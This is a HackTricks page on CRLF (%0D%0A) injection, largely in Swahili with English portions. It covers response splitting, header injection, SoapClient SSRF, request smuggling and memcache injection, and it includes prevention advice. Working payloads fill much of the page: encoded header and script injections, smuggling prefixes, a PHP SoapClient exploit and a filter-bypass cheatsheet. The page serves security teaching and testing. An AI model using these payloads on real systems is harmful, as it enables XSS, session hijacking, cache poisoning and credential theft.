hacktricks/pentesting-web/crlf-0d-0a.md

16 KiB

CRLF (%0D%0A) Injection

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Bug bounty tip: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na uanze kupata zawadi hadi $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

CRLF

Carriage Return (CR) na Line Feed (LF), kwa pamoja wanajulikana kama CRLF, ni mfuatano wa wahusika maalum unaotumika katika itifaki ya HTTP kuashiria mwisho wa mstari au kuanza mstari mpya. Seva za wavuti na vivinjari hutumia CRLF kutofautisha kati ya vichwa vya HTTP na mwili wa jibu. Wahusika hawa hutumika kwa ujumla katika mawasiliano ya HTTP/1.1 kati ya aina mbalimbali za seva za wavuti, kama vile Apache na Microsoft IIS.

CRLF Injection Vulnerability

CRLF injection inahusisha kuingiza wahusika wa CR na LF katika pembejeo zinazotolewa na mtumiaji. Kitendo hiki kinapotosha seva, programu, au mtumiaji kufasiri mfuatano ulioingizwa kama mwisho wa jibu moja na mwanzo wa jingine. Ingawa wahusika hawa si hatari kwa asili, matumizi yao mabaya yanaweza kusababisha kugawanyika kwa majibu ya HTTP na shughuli nyingine za uhalifu.

Example: CRLF Injection in a Log File

Example from here

Fikiria faili la kumbukumbu katika paneli ya usimamizi inayofuata muundo: IP - Wakati - Njia Iliyotembelewa. Kuingia kwa kawaida kunaweza kuonekana kama:

123.123.123.123 - 08:15 - /index.php?page=home

Mshambuliaji anaweza kutumia CRLF injection kubadilisha hii log. Kwa kuingiza wahusika wa CRLF katika ombi la HTTP, mshambuliaji anaweza kubadilisha mtiririko wa pato na kutunga entries za log. Kwa mfano, mfuatano ulioingizwa unaweza kubadilisha entry ya log kuwa:

/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit

Hapa, %0d na %0a zinawakilisha fomu za URL-encoded za CR na LF. Baada ya shambulio, log itakuwa naonyesha kwa njia ya kupotosha:

IP - Time - Visited Path

123.123.123.123 - 08:15 - /index.php?page=home&
127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit

The attacker thus cloaks their malicious activities by making it appear as if the localhost (an entity typically trusted within the server environment) performed the actions. The server interprets the part of the query starting with %0d%0a as a single parameter, while the restrictedaction parameter is parsed as another, separate input. The manipulated query effectively mimics a legitimate administrative command: /index.php?page=home&restrictedaction=edit

HTTP Response Splitting

Description

HTTP Response Splitting ni udhaifu wa usalama unaotokea wakati mshambuliaji anatumia muundo wa majibu ya HTTP. Muundo huu unachanganya vichwa na mwili kwa kutumia mfuatano maalum wa wahusika, Carriage Return (CR) ikifuatiwa na Line Feed (LF), kwa pamoja huitwa CRLF. Ikiwa mshambuliaji anaweza kuingiza mfuatano wa CRLF katika kichwa cha jibu, wanaweza kwa ufanisi kubadilisha maudhui ya jibu linalofuata. Aina hii ya urekebishaji inaweza kusababisha matatizo makubwa ya usalama, hasa Cross-site Scripting (XSS).

XSS through HTTP Response Splitting

  1. Programu inaweka kichwa maalum kama hiki: X-Custom-Header: UserInput
  2. Programu inapata thamani ya UserInput kutoka kwa parameter ya query, sema "user_input". Katika hali ambazo hazina uthibitisho sahihi wa pembejeo na uandishi, mshambuliaji anaweza kuunda payload inayojumuisha mfuatano wa CRLF, ikifuatiwa na maudhui mabaya.
  3. Mshambuliaji anaunda URL yenye 'user_input' iliyoundwa kwa njia maalum: ?user_input=Value%0d%0a%0d%0a<script>alert('XSS')</script>
  • Katika URL hii, %0d%0a%0d%0a ni fomu ya URL-encoded ya CRLFCRLF. Inapotosha server kuingiza mfuatano wa CRLF, ikifanya server itendee sehemu inayofuata kama mwili wa jibu.
  1. Server inareflect pembejeo ya mshambuliaji katika kichwa cha jibu, ikisababisha muundo usio kusudiwa wa jibu ambapo script mbaya inatafsiriwa na kivinjari kama sehemu ya mwili wa jibu.

An example of HTTP Response Splitting leading to Redirect

From https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62

Browser to:

/%0d%0aLocation:%20http://myweb.com

Na server inajibu na kichwa:

Location: http://myweb.com

Mfano mwingine: (kutoka https://www.acunetix.com/websitesecurity/crlf-injection/)

http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E

Katika Njia ya URL

Unaweza kutuma payload ndani ya njia ya URL ili kudhibiti jibu kutoka kwa seva (mfano kutoka hapa):

http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E

Check more examples in:

{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}

HTTP Header Injection

HTTP Header Injection, mara nyingi inavyotumiwa kupitia CRLF (Carriage Return and Line Feed) injection, inaruhusu washambuliaji kuingiza vichwa vya HTTP. Hii inaweza kudhoofisha mitambo ya usalama kama vile XSS (Cross-Site Scripting) filters au SOP (Same-Origin Policy), ambayo inaweza kusababisha ufikiaji usioidhinishwa wa data nyeti, kama vile CSRF tokens, au udanganyifu wa vikao vya watumiaji kupitia kupanda kwa cookie.

Exploiting CORS via HTTP Header Injection

Mshambuliaji anaweza kuingiza vichwa vya HTTP ili kuwezesha CORS (Cross-Origin Resource Sharing), akipita vizuizi vilivyowekwa na SOP. Uvunjaji huu unaruhusu scripts kutoka kwa vyanzo vya uhalifu kuingiliana na rasilimali kutoka chanzo tofauti, na hivyo kupata data iliyo salama.

SSRF and HTTP Request Injection via CRLF

CRLF injection inaweza kutumika kuunda na kuingiza ombi jipya la HTTP. Mfano maarufu wa hili ni udhaifu katika darasa la SoapClient la PHP, hasa ndani ya parameter ya user_agent. Kwa kubadilisha parameter hii, mshambuliaji anaweza kuingiza vichwa vya ziada na maudhui ya mwili, au hata kuingiza ombi jipya la HTTP kabisa. Hapa chini kuna mfano wa PHP unaoonyesha uvunjaji huu:

$target = 'http://127.0.0.1:9090/test';
$post_string = 'variable=post value';
$crlf = array(
'POST /proxy HTTP/1.1',
'Host: local.host.htb',
'Cookie: PHPSESSID=[PHPSESSID]',
'Content-Type: application/x-www-form-urlencoded',
'Content-Length: '.(string)strlen($post_string),
"\r\n",
$post_string
);

$client = new SoapClient(null,
array(
'uri'=>$target,
'location'=>$target,
'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
)
);

# Put a netcat listener on port 9090
$client->__soapCall("test", []);

Header Injection to Request Smuggling

Kwa maelezo zaidi kuhusu mbinu hii na matatizo yanayoweza kutokea angalia chanzo asilia.

Unaweza kuingiza vichwa muhimu ili kuhakikisha back-end inaendelea na muunganisho wazi baada ya kujibu ombi la awali:

GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1

Afterward, a second request can be specified. This scenario typically involves HTTP request smuggling, a technique where extra headers or body elements appended by the server post-injection can lead to various security exploits.

Exploitation:

  1. Malicious Prefix Injection: This method involves poisoning the next user's request or a web cache by specifying a malicious prefix. An example of this is:

GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1

  1. Crafting a Prefix for Response Queue Poisoning: This approach involves creating a prefix that, when combined with trailing junk, forms a complete second request. This can trigger response queue poisoning. An example is:

GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1

Memcache Injection

Memcache is a key-value store that uses a clear text protocol. More info in:

{% content-ref url="../network-services-pentesting/11211-memcache/" %} 11211-memcache {% endcontent-ref %}

For the full information read the original writeup

If a platform is taking data from an HTTP request and using it without sanitizing it to perform requests to a memcache server, an attacker could abuse this behaviour to inject new memcache commands.

For example, in the original discovered vuln, cache keys were used to return the IP and port a user should connect to, and attackers were able to inject memcache commands that would poison the cache to send the victims details (usernames and passwords included) to the attacker servers:

https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop

Moreover, researchers also discovered that they could desync the memcache responses to send the attacker's IP and ports to users whose email the attacker didn't know:

https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&h=506&auto=format&fit=crop

How to Prevent CRLF / HTTP Header Injections in Web Applications

To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Injections in web applications, the following strategies are recommended:

  1. Avoid Direct User Input in Response Headers: Njia salama zaidi ni kuepuka kuingiza maoni ya mtumiaji moja kwa moja katika vichwa vya majibu.
  2. Encode Special Characters: Ikiwa kuepuka kuingiza maoni ya mtumiaji moja kwa moja haiwezekani, hakikisha kutumia kazi iliyokusudiwa kwa ajili ya kuandika wahusika maalum kama CR (Carriage Return) na LF (Line Feed). Praktiki hii inazuia uwezekano wa CRLF injection.
  3. Update Programming Language: Sasisha mara kwa mara lugha ya programu inayotumika katika programu zako za wavuti hadi toleo la hivi karibuni. Chagua toleo ambalo kwa asili haliruhusu kuingizwa kwa wahusika wa CR na LF ndani ya kazi zinazotumika kuweka vichwa vya HTTP.

CHEATSHEET

Cheatsheet from here

1. HTTP Response Splitting
• /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)

2. CRLF chained with Open Redirect
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
• /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com

3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E

4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (<)
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test

Vifaa vya Moja kwa Moja

Orodha ya Ugunduzi wa Brute-Force

Marejeleo

Usisahau: jiandikishe kwa Intigriti, jukwaa la bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers! Jiunge nasi https://go.intigriti.com/hacktricks leo, na anza kupata zawadi hadi $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

{% hint style="success" %} Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}